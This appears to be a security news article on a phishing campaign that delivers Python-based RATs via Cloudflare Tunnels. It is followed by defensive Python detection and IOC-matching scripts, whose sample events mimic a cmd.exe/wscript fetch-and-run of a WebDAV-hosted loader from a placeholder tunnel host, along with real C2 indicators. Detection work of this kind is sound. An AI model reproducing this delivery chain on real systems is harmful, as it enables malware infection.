Hackers Exploit Cloudflare Tunnels to Infect Windows Systems With Python Malware
A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, leveraging Cloudflare Tunnel infrastructure to deliver Python-based malware to Windows systems across Western nations, including the United States, United Kingdom, and Germany.
This ongoing operation, characterized by its use of obfuscated scripts and memory-injected payloads, demonstrates an alarming evolution in threat actor tactics, exploiting trusted cloud services to bypass network defenses and maintain anonymity.
The campaign, which primarily targets users via phishing emails themed around fake invoices, uses a complex, multi-stage infection chain designed for stealth and persistence, posing significant challenges to traditional endpoint security solutions.
Multi-Stage Attack Chain Evades Traditional Defenses
The attack begins with malicious shortcut files (.lnk) disguised as PDF documents, often delivered through zipped attachments in phishing emails.
These files, crafted to appear benign with custom icons, silently execute commands via cmd.exe to fetch remote payloads over WebDAV using Cloudflare’s trycloudflare[.]com subdomains.
According to the Securonix report, this initial access method marks a shift from earlier tactics involving .url files and simplistic .bat scripts, reflecting growing sophistication as the attackers adapt to evade detection by email filters and user scrutiny.
Once executed, the .lnk files download subsequent stages, including obfuscated Windows Script Files (.wsf) and batch scripts (.bat), which serve as loaders for Python-based malware.

These scripts are heavily encoded, using techniques such as UTF-16LE encoding and character substitution to obscure their intent, ultimately deploying shellcode that injects a Donut-packed PE payload directly into memory, avoiding disk-based detection.
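The chain described above (a shortcut launching cmd.exe, which fetches a script over WebDAV from a trycloudflare.com host, which in turn hands off to a script host and then Python) leaves a recognisable sequence in process-creation telemetry. The following is an added detection example written for this article; it is not code from Securonix or from the report. The events are constructed here, and it assumes the WebDAV fetch appears in the command line as a Windows UNC path (the `\\host@SSL\DavWWWRoot\` form the WebDAV redirector uses); the tunnel hostname in the samples is a placeholder, not an indicator.

```python
import re
from dataclasses import dataclass

# Hosts under trycloudflare.com are ephemeral, so match the parent domain, not a fixed subdomain.
TUNNEL_HOST = re.compile(r"[a-z0-9-]+\.trycloudflare\.com", re.IGNORECASE)
# Signs that the path is a WebDAV/UNC fetch rather than an ordinary HTTPS URL.
WEBDAV_HINT = re.compile(r"\\\\|@ssl|davwwwroot", re.IGNORECASE)
# Script hosts that a phishing shortcut typically chains through before Python runs.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# User-writable locations where a dropped Python runtime would live.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\temp\\|\\tmp\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or an EDR would give you)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcessEvent) -> list[str]:
    """Return the names of the rules that fire for one event (empty list if none)."""
    findings = []
    cmd = ev.command_line
    img, parent = basename(ev.image), basename(ev.parent_image)

    # Rule 1: any process referencing a trycloudflare.com host via a WebDAV/UNC path.
    if TUNNEL_HOST.search(cmd) and WEBDAV_HINT.search(cmd):
        findings.append("webdav_tunnel_fetch")

    # Rule 2: Python started by a script host, or running from a user-writable directory.
    if img in {"python.exe", "pythonw.exe"} and (parent in SCRIPT_HOSTS or USER_WRITABLE.search(ev.image)):
        findings.append("unusual_python_execution")

    # Rule 3: cmd.exe handing a .wsf file to wscript/cscript (the loader stage in the article).
    if img in {"wscript.exe", "cscript.exe"} and parent == "cmd.exe" and ".wsf" in cmd.lower():
        findings.append("wsf_loader_chain")

    return findings


def scan(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """Run every rule over every event; returns (event index, rule name) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in detect(ev)]


# Constructed sample events: the first three mimic the chain, the last two are benign.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c start /min \\placeholder-words-here.trycloudflare.com@SSL\DavWWWRoot\invoice.wsf"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe //B \\placeholder-words-here.trycloudflare.com@SSL\DavWWWRoot\invoice.wsf"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\alice\AppData\Local\Temp\py\pythonw.exe",
                 r"pythonw.exe stage.py"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c dir C:\Users\alice"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Python312\python.exe",
                 r"python.exe app.py"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Rule 1 fires on its own for the initial fetch; rules 2 and 3 are weaker individually (developers do run Python from AppData) and are best correlated with rule 1 on the same host within a short window before raising severity.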
Sophisticated SERPENTINE#CLOUD Campaign
A standout feature of SERPENTINE#CLOUD is its abuse of Cloudflare Tunnels, a service intended for developers to expose local servers temporarily.
By hosting payloads on dynamic, ephemeral subdomains, attackers eliminate the need for traditional infrastructure like VPS servers or registered domains, complicating takedown efforts and attribution.

The use of HTTPS and WebDAV over SSL further encrypts payload delivery, evading deep packet inspection and network intrusion detection systems.
Additionally, the campaign employs Early Bird APC injection to execute shellcode within legitimate processes like notepad.exe, ensuring stealthy operation.
Final-stage Python payloads, obfuscated with tools like Kramer, decrypt RC4-encrypted shellcode in memory, often leading to the deployment of RATs such as AsyncRAT or RevengeRAT, granting attackers full command-and-control over infected systems for data exfiltration or lateral movement.
Persistence is achieved through scripts dropped in the Windows Startup folder, including .vbs files that mimic earlier attack stages and keep systems active by simulating user input.
The campaign’s focus on Western targets, coupled with English-language code comments, hints at a sophisticated actor testing scalable delivery mechanisms.
Cybersecurity experts recommend heightened vigilance against unsolicited attachments, enabling file extension visibility, and monitoring unusual Python executions or traffic to Cloudflare subdomains.
Indicators of Compromise (IOCs)
Type | Indicator | Details |
---|---|---|
C2 Address | nhvncpure[.]shop | Command-and-Control domain |
C2 Address | nhvncpure.duckdns[.]org | Dynamic DNS for C2 communication |
IP Address | 51.89.212[.]145 | Associated with multiple C2 domains |
Cloudflare Tunnel | hxxps://flour-riding-merit-refers.trycloudflare[.]com | Payload hosting subdomain |
File Hash (SHA256) | 193218243C54D7903C65F5E7BE9B865DDB286DA9005C69E6E955E31EC3EFA1A7 | Online-wire-confirmation-receipt846752.zip |
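The indicators above are published defanged (`[.]`, `hxxps://`), so they need refanging before they can be matched against DNS, proxy, firewall or EDR logs. The script below is an added example for this article, not code from Securonix; it takes the table's indicators, refangs and normalises them, and runs them over a handful of constructed log lines. Because the tunnel subdomains are ephemeral, it also flags any other trycloudflare.com host as lower-severity tunnel usage, which is the generalisation the article itself suggests when it recommends monitoring traffic to Cloudflare subdomains.

```python
import re

# The table's indicators, copied as published (defanged). Kinds are labels chosen for this example.
IOCS = {
    "nhvncpure[.]shop": "c2_domain",
    "nhvncpure.duckdns[.]org": "c2_domain",
    "51.89.212[.]145": "c2_ip",
    "hxxps://flour-riding-merit-refers.trycloudflare[.]com": "payload_host",
    "193218243C54D7903C65F5E7BE9B865DDB286DA9005C69E6E955E31EC3EFA1A7": "zip_sha256",
}


def refang(ioc: str) -> str:
    """Undo common defanging: [.] -> . and hxxp(s):// -> http(s)://."""
    s = ioc.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)


def normalize(ioc: str) -> str:
    """Lower-case, drop the scheme and any path so a URL indicator matches as a host."""
    s = re.sub(r"^https?://", "", refang(ioc).lower())
    return s.split("/")[0]


def compile_matchers(iocs: dict) -> list:
    """One regex per indicator, bounded so 51.89.212.145 does not match inside 151.89.212.145.
    Dots are allowed at the edges, so a subdomain of a C2 domain still matches."""
    return [(re.compile(r"(?<![\w-])" + re.escape(normalize(k)) + r"(?![\w-])", re.IGNORECASE), v, normalize(k))
            for k, v in iocs.items()]


MATCHERS = compile_matchers(IOCS)
TUNNEL = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.IGNORECASE)


def match_line(line: str) -> list[tuple[str, str]]:
    """Return (kind, indicator) pairs found in one log line."""
    hits = [(kind, ioc) for rx, kind, ioc in MATCHERS if rx.search(line)]
    # Generic tunnel usage: only reported when no known payload host already matched.
    m = TUNNEL.search(line)
    if m and not any(kind == "payload_host" for kind, _ in hits):
        hits.append(("tunnel_usage", m.group(0).lower()))
    return hits


def scan(lines: list[str]) -> list[tuple[int, list[tuple[str, str]]]]:
    """Lines with at least one hit, as (line index, hits)."""
    out = []
    for i, line in enumerate(lines):
        hits = match_line(line)
        if hits:
            out.append((i, hits))
    return out


# Constructed log lines (timestamps and client addresses are invented for the example).
SAMPLE_LOGS = [
    "t=1 dns client=10.0.0.5 query=nhvncpure.duckdns.org type=A",
    "t=2 proxy client=10.0.0.5 CONNECT flour-riding-merit-refers.trycloudflare.com:443",
    "t=3 fw src=10.0.0.5 dst=51.89.212.145 dport=443 action=allow",
    "t=4 edr file=Online-wire-confirmation-receipt846752.zip "
    "sha256=193218243c54d7903c65f5e7be9b865ddb286da9005c69e6e955e31ec3efa1a7",
    "t=5 proxy client=10.0.0.9 CONNECT placeholder-words-here.trycloudflare.com:443",
    "t=6 dns client=10.0.0.7 query=updates.example.com type=A",
    "t=7 fw src=10.0.0.8 dst=151.89.212.145 dport=443 action=allow",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOGS):
        print(idx, hits)
```

Treat `tunnel_usage` as a lead rather than a verdict: Cloudflare Tunnel has legitimate developer uses, so the generic match is worth reviewing alongside the process telemetry from the same host, while a hit on one of the table's indicators warrants immediate isolation.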